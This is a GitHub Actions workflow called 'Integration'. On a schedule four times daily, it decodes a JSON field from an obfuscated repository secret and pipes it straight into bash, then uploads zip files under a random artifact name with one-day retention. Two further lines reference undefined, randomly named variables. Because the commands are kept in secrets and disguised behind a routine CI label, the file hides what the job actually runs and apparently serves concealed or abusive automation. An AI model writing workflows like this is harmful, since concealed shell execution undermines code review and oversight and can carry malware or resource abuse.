name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '54 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          ap92: ${{ secrets.ap92 }}
        run: |
          printf '%s' "$ap92" | jq -r .vt85 | /bin/bash
          printf '%s' "$a9814" | jq -r .k20397 | /bin/bash
          printf '%s' "$rrxi182" | jq -r .vbmk0620 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: zMD2bWJi
          path: "*.zip"
          retention-days: 1
